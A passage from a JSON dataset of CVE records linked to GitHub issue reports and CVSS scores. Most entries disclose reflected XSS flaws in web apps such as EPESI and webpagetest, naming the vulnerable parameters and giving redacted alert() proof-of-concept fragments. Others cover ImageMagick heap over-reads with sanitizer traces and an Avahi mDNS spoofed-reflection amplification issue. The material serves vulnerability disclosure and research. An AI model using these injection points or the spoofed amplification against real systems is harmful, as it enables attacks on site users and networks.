  13148. "Issue_Url_new": "https://github.com/inter-mediator/inter-mediator/issues/772",
  13149. "Repo_new": "inter-mediator/inter-mediator",
  13150. "Issue_Created_At": "2017-03-03T12:55:16Z",
  13151. "description": "INTER Mediator \u2013 Multiple Cross Site Scripting (XSS) . Product: INTER Mediator Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cINTER Mediator NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cc\u201d HTTP POST parameter and in the \u201ccred\u201d HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG POST parameter : cred Value : \" /> APITAG alert NUMBERTAG APITAG < To: FILETAG NUMBERTAG URLTAG",
  13152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13153. "severity": "MEDIUM",
  13154. "baseScore": 6.1,
  13155. "impactScore": 2.7,
  13156. "exploitabilityScore": 2.8
  13157. },
  13158. {
  13159. "CVE_ID": "CVE-2017-6485",
  13160. "Issue_Url_old": "https://github.com/jasonjoh/php-calendar/issues/4",
  13161. "Issue_Url_new": "https://github.com/jasonjoh/php-calendar/issues/4",
  13162. "Repo_new": "jasonjoh/php-calendar",
  13163. "Issue_Created_At": "2017-03-03T16:54:12Z",
  13164. "description": "php calendar \u2013 Cross Site Scripting (XSS) . Product: php calendar Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cphp calendar latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the \u201cphp calendar APITAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13165. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13166. "severity": "MEDIUM",
  13167. "baseScore": 6.1,
  13168. "impactScore": 2.7,
  13169. "exploitabilityScore": 2.8
  13170. },
  13171. {
  13172. "CVE_ID": "CVE-2017-6486",
  13173. "Issue_Url_old": "https://github.com/reasoncms/reasoncms/issues/264",
  13174. "Issue_Url_new": "https://github.com/reasoncms/reasoncms/issues/264",
  13175. "Repo_new": "reasoncms/reasoncms",
  13176. "Issue_Created_At": "2017-03-02T17:00:54Z",
  13177. "description": "reasoncms \u2013 Cross Site Scripting (XSS). Product: reasoncms Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201creasoncms NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13178. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13179. "severity": "MEDIUM",
  13180. "baseScore": 6.1,
  13181. "impactScore": 2.7,
  13182. "exploitabilityScore": 2.8
  13183. },
  13184. {
  13185. "CVE_ID": "CVE-2017-6487",
  13186. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/165",
  13187. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/165",
  13188. "Repo_new": "Telaxus/EPESI",
  13189. "Issue_Created_At": "2017-03-02T18:16:08Z",
  13190. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : state, element, id, tab, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13192. "severity": "MEDIUM",
  13193. "baseScore": 6.1,
  13194. "impactScore": 2.7,
  13195. "exploitabilityScore": 2.8
  13196. },
  13197. {
  13198. "CVE_ID": "CVE-2017-6488",
  13199. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/166",
  13200. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/166",
  13201. "Repo_new": "Telaxus/EPESI",
  13202. "Issue_Created_At": "2017-03-02T18:17:34Z",
  13203. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : visible, tab, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13205. "severity": "MEDIUM",
  13206. "baseScore": 6.1,
  13207. "impactScore": 2.7,
  13208. "exploitabilityScore": 2.8
  13209. },
  13210. {
  13211. "CVE_ID": "CVE-2017-6489",
  13212. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/169",
  13213. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/169",
  13214. "Repo_new": "Telaxus/EPESI",
  13215. "Issue_Created_At": "2017-03-02T18:21:19Z",
  13216. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : element, state, cat, id, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13217. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13218. "severity": "MEDIUM",
  13219. "baseScore": 6.1,
  13220. "impactScore": 2.7,
  13221. "exploitabilityScore": 2.8
  13222. },
  13223. {
  13224. "CVE_ID": "CVE-2017-6491",
  13225. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/168",
  13226. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/168",
  13227. "Repo_new": "Telaxus/EPESI",
  13228. "Issue_Created_At": "2017-03-02T18:20:04Z",
  13229. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : tooltip_id,callback,args, cid Value : > APITAG alert NUMBERTAG APITAG < To: FILETAG FILETAG",
  13230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13231. "severity": "MEDIUM",
  13232. "baseScore": 6.1,
  13233. "impactScore": 2.7,
  13234. "exploitabilityScore": 2.8
  13235. },
  13236. {
  13237. "CVE_ID": "CVE-2017-6500",
  13238. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/376",
  13239. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/376",
  13240. "Repo_new": "imagemagick/imagemagick",
  13241. "Issue_Created_At": "2017-02-08T15:32:18Z",
  13242. "description": "out of bounds read in APITAG This bug was found while fuzzing APITAG with afl fuzz Tested on APITAG git commit APITAG Command: magick bug2 /dev/null FILETAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG eb2 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG bfe4d NUMBERTAG sp NUMBERTAG bfe4d NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG eb2 thread T NUMBERTAG d NUMBERTAG f in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c9e in APITAG PATHTAG NUMBERTAG b1b7b4 in APITAG PATHTAG NUMBERTAG dfda in APITAG PATHTAG NUMBERTAG dfda in main PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG db7 in _start ( PATHTAG NUMBERTAG b NUMBERTAG eb2 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG ea NUMBERTAG b NUMBERTAG eb1) allocated by thread T0 here NUMBERTAG e4 in malloc ( PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG aa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG aa NUMBERTAG c0: fa fa fa fa fa fa fa fa fd fd fd fd fa fa fd fd NUMBERTAG aa NUMBERTAG d0: fd fd fa fa NUMBERTAG fa fa fa fd fd fd fd fa fa NUMBERTAG aa NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG aa NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd 
fd fa fa fd fd NUMBERTAG aa NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG aa NUMBERTAG fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG aa NUMBERTAG fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Aborted",
  13243. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13244. "severity": "MEDIUM",
  13245. "baseScore": 5.5,
  13246. "impactScore": 3.6,
  13247. "exploitabilityScore": 1.8
  13248. },
  13249. {
  13250. "CVE_ID": "CVE-2017-6500",
  13251. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/375",
  13252. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/375",
  13253. "Repo_new": "imagemagick/imagemagick",
  13254. "Issue_Created_At": "2017-02-08T15:29:18Z",
  13255. "description": "out of bounds read in APITAG This bug was found while fuzzing APITAG with afl fuzz Tested on APITAG git commit APITAG Command: magick bug1 /dev/null FILETAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG d NUMBERTAG f in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG c9e in APITAG PATHTAG NUMBERTAG b1b7b4 in APITAG PATHTAG NUMBERTAG dfda in APITAG PATHTAG NUMBERTAG dfda in main PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG db7 in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b NUMBERTAG b NUMBERTAG allocated by thread T0 here NUMBERTAG e4 in malloc ( PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG aac6e in APITAG PATHTAG NUMBERTAG dc8 in APITAG PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG c5b7ae in APITAG PATHTAG NUMBERTAG c5f NUMBERTAG f in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG e NUMBERTAG fa fa fd fd fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ea0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG eb0: fa fa NUMBERTAG fa fa fa 
NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ec0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG b NUMBERTAG ed0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Aborted",
  13256. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13257. "severity": "MEDIUM",
  13258. "baseScore": 5.5,
  13259. "impactScore": 3.6,
  13260. "exploitabilityScore": 1.8
  13261. },
  13262. {
  13263. "CVE_ID": "CVE-2017-6509",
  13264. "Issue_Url_old": "https://github.com/Smith0r/burgundy-cms/issues/36",
  13265. "Issue_Url_new": "https://github.com/smith0r/burgundy-cms/issues/36",
  13266. "Repo_new": "Smith0r/burgundy-cms",
  13267. "Issue_Created_At": "2017-03-05T15:05:17Z",
  13268. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"action\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13269. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13270. "severity": "MEDIUM",
  13271. "baseScore": 6.1,
  13272. "impactScore": 2.7,
  13273. "exploitabilityScore": 2.8
  13274. },
  13275. {
  13276. "CVE_ID": "CVE-2017-6511",
  13277. "Issue_Url_old": "https://github.com/andrzuk/FineCMS/issues/2",
  13278. "Issue_Url_new": "https://github.com/andrzuk/finecms/issues/2",
  13279. "Repo_new": "andrzuk/finecms",
  13280. "Issue_Created_At": "2017-03-04T15:28:47Z",
  13281. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"action\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG FILETAG FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13282. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13283. "severity": "MEDIUM",
  13284. "baseScore": 6.1,
  13285. "impactScore": 2.7,
  13286. "exploitabilityScore": 2.8
  13287. },
  13288. {
  13289. "CVE_ID": "CVE-2017-6519",
  13290. "Issue_Url_old": "https://github.com/lathiat/avahi/issues/203",
  13291. "Issue_Url_new": "https://github.com/lathiat/avahi/issues/203",
  13292. "Repo_new": "lathiat/avahi",
  13293. "Issue_Created_At": "2018-11-08T16:06:58Z",
  13294. "description": "Missing link local checks in Avahi makes APITAG with mDNS traffic reflection possible. I tried with Scapy to do a reflection with amplification on mDNS service running Avahi (git master branch and version NUMBERTAG with a good result. This is very similar to issue APITAG observed with SSDP URLTAG : lack of link local checks when processing queries. I sent spoofed datagram to mDNS with: APITAG This was responded by Avahi with amplification from NUMBERTAG to NUMBERTAG bytes and sent to spoofed IP. CODETAG Attaching PCAP file with query and response. Query was sent from same subnet. FILETAG As you see Avahi replied to multicast query and sent reply to Cloudflare's DNS server on NUMBERTAG port. TTL was NUMBERTAG My router decremented that to NUMBERTAG and forwarded packet to WAN, Unicast queries seems to be handled in a similar way. I tested some more devices not running Avahi to have better understanding of the issue. My very old AVR (vulnerable to mDNS reflection on various ports, seems to have no link local checks). Avahi daemon NUMBERTAG also vulnerable, didn't fallback to multicast, nor ignore non link local queries, moreover it responds with unicast to src/dst port NUMBERTAG which seems to violate RFS and cause even more reflections possible). On the other hand Google Chromecast seems to do very strict link local checks and answers mostly with multicast replies. What is very interesting, as it ignores any non link local queries. I was unable to do any reflection with Chromecast. I played also a bit with APITAG mDNS implementation and it seems to ignore all my attempts just as Chromecast do. In my opinion section NUMBERTAG of mDNS RFC NUMBERTAG still applies to Legacy Unicast Responses. Link local checks should be done, and non link local queries discarded. Google Chromecast seems to ignore requirements of s ection NUMBERTAG APITAG Unicast Responses) and sends response to NUMBERTAG port with multicast reply. Could this be fixed just by a strict verification of source address belongs to link local network to make sure remote, rouge queries are ignored? The second part of improvement would be removal of legacy support and force of fallback to multicast to ensure answers are link local too. This however might break backward compatibility as I understand.",
  13295. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  13296. "severity": "CRITICAL",
  13297. "baseScore": 9.1,
  13298. "impactScore": 5.2,
  13299. "exploitabilityScore": 3.9
  13300. },
  13301. {
  13302. "CVE_ID": "CVE-2017-6533",
  13303. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/833",
  13304. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/833",
  13305. "Repo_new": "wpo-foundation/webpagetest",
  13306. "Issue_Created_At": "2017-03-04T07:52:39Z",
  13307. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cbenchmark\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13308. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13309. "severity": "MEDIUM",
  13310. "baseScore": 6.1,
  13311. "impactScore": 2.7,
  13312. "exploitabilityScore": 2.8
  13313. },
  13314. {
  13315. "CVE_ID": "CVE-2017-6534",
  13316. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/835",
  13317. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/835",
  13318. "Repo_new": "wpo-foundation/webpagetest",
  13319. "Issue_Created_At": "2017-03-04T07:53:23Z",
  13320. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cpssid\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13321. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13322. "severity": "MEDIUM",
  13323. "baseScore": 6.1,
  13324. "impactScore": 2.7,
  13325. "exploitabilityScore": 2.8
  13326. },
  13327. {
  13328. "CVE_ID": "CVE-2017-6535",
  13329. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/832",
  13330. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/832",
  13331. "Repo_new": "wpo-foundation/webpagetest",
  13332. "Issue_Created_At": "2017-03-04T07:52:20Z",
  13333. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13334. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13335. "severity": "MEDIUM",
  13336. "baseScore": 6.1,
  13337. "impactScore": 2.7,
  13338. "exploitabilityScore": 2.8
  13339. },
  13340. {
  13341. "CVE_ID": "CVE-2017-6536",
  13342. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/838",
  13343. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/838",
  13344. "Repo_new": "wpo-foundation/webpagetest",
  13345. "Issue_Created_At": "2017-03-04T07:54:40Z",
  13346. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13347. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13348. "severity": "MEDIUM",
  13349. "baseScore": 6.1,
  13350. "impactScore": 2.7,
  13351. "exploitabilityScore": 2.8
  13352. },
  13353. {
  13354. "CVE_ID": "CVE-2017-6537",
  13355. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/837",
  13356. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/837",
  13357. "Repo_new": "wpo-foundation/webpagetest",
  13358. "Issue_Created_At": "2017-03-04T07:54:05Z",
  13359. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cbgcolor\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG PATHTAG APITAG",
  13360. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13361. "severity": "MEDIUM",
  13362. "baseScore": 6.1,
  13363. "impactScore": 2.7,
  13364. "exploitabilityScore": 2.8
  13365. },
  13366. {
  13367. "CVE_ID": "CVE-2017-6538",
  13368. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/836",
  13369. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/836",
  13370. "Repo_new": "wpo-foundation/webpagetest",
  13371. "Issue_Created_At": "2017-03-04T07:53:43Z",
  13372. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cvideo\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13373. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13374. "severity": "MEDIUM",
  13375. "baseScore": 6.1,
  13376. "impactScore": 2.7,
  13377. "exploitabilityScore": 2.8
  13378. },
  13379. {
  13380. "CVE_ID": "CVE-2017-6539",
  13381. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/831",
  13382. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/831",
  13383. "Repo_new": "wpo-foundation/webpagetest",
  13384. "Issue_Created_At": "2017-03-04T07:51:58Z",
